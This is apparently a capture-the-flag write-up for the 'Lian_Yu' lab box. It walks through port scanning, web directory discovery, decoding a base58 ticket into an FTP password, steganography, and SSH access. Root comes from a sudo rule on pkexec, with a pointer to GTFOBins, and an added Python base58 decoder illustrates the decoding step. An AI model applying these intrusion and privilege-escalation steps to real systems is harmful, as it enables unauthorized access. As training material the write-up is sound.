21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 43835/tcp6 status
| 100024 1 48319/udp status
| 100024 1 57610/udp6 status
|_ 100024 1 58608/tcp status
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
A first gobuster scan reveals a hidden island directory:
$ curl -s http://10.10.222.216/island/
<!DOCTYPE html>
<html>
<body>
<style>
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>
</body>
</html>
This reveals a potential username, vigilante. A deeper dirsearch scan reveals another directory, /2100:
$ curl -s http://10.10.222.216/island/2100/
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
There is a hint here saying we can avail our .ticket, which means a file with the .ticket extension exists in this directory. Grep medium.txt for candidate names, or run gobuster with the .ticket extension, to find the file: green_arrow.ticket. This page contains:
$ curl -s http://10.10.97.18/island/2100/green_arrow.ticket
This is just a token to get into Queen's Gambit(Ship)
RTy8yhBQdscX
The string is base58 encoded; decoding it gives the password, so we now have a valid credential pair: vigilante:!#th3h00d
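As an added illustration (not part of the original writeup), a minimal base58 decoder and encoder: the point is that the .ticket token is plain encoding, not encryption, so anything published this way in a web-reachable file must be treated as disclosed. The Bitcoin base58 alphabet is assumed, which is the one the token decodes under.

```python
# Added example, not from the original writeup: base58 decode/encode without
# third-party packages. The alphabet is the Bitcoin one (no 0, O, I or l),
# which is an assumption that happens to match this token.
BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_INDEX = {c: i for i, c in enumerate(BASE58_ALPHABET)}


def base58_decode(token: str) -> bytes:
    """Decode a base58 string into bytes.

    Raises ValueError on characters outside the alphabet, so a string that
    merely looks like base58 is rejected instead of silently mis-decoded.
    """
    value = 0
    for ch in token:
        if ch not in _INDEX:
            raise ValueError(f"invalid base58 character: {ch!r}")
        value = value * 58 + _INDEX[ch]
    # Each leading '1' stands for one 0x00 byte that the integer form loses.
    leading_zeros = len(token) - len(token.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * leading_zeros + body


def base58_encode(data: bytes) -> str:
    """Inverse of base58_decode; used here to confirm the round trip."""
    value = int.from_bytes(data, "big")
    digits = []
    while value:
        value, rem = divmod(value, 58)
        digits.append(BASE58_ALPHABET[rem])
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + "".join(reversed(digits))


if __name__ == "__main__":
    token = "RTy8yhBQdscX"  # the .ticket token quoted in the writeup
    secret = base58_decode(token)
    print(secret.decode("ascii"))            # !#th3h00d
    assert base58_encode(secret) == token    # round trip holds
```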
Enumeration
Logging onto the FTP server with these credentials, we get:
$ ftp 10.10.97.18
Connected to 10.10.97.18 (10.10.97.18).
220 (vsFTPd 3.0.2)
Name (10.10.97.18:unknown): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (10,10,97,18,83,105).
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 May 05 11:10 .
drwxr-xr-x 4 0 0 4096 May 01 05:38 ..
-rw------- 1 1001 1001 44 May 01 07:13 .bash_history
-rw-r--r-- 1 1001 1001 220 May 01 05:38 .bash_logout
-rw-r--r-- 1 1001 1001 3515 May 01 05:38 .bashrc
-rw-r--r-- 1 0 0 2483 May 01 07:07 .other_user
-rw-r--r-- 1 1001 1001 675 May 01 05:38 .profile
-rw-r--r-- 1 0 0 511720 May 01 03:26 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 11:10 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 03:25 aa.jpg
226 Directory send OK.
ftp> get .other_user
local: .other_user remote: .other_user
227 Entering Passive Mode (10,10,97,18,61,173).
150 Opening BINARY mode data connection for .other_user (2483 bytes).
226 Transfer complete.
2483 bytes received in 0.0029 secs (857.39 Kbytes/sec)
ftp> mget *
Analysing the *.png files discloses a passphrase; crack it using steganography tools. The .other_user text file discloses a potential username, slade:
$ cat .other_user
Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Washington where he had been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training
Once we have the passphrase, we can use it to extract ss.zip:
$ unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
$ cat shado
M3tahuman
Now log on to the SSH service using the above credentials and grab user.txt.
Privilege Escalation
Listing the sudo permissions with the sudo -l command:
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
Look up the pkexec binary on GTFOBins and grab the root flag!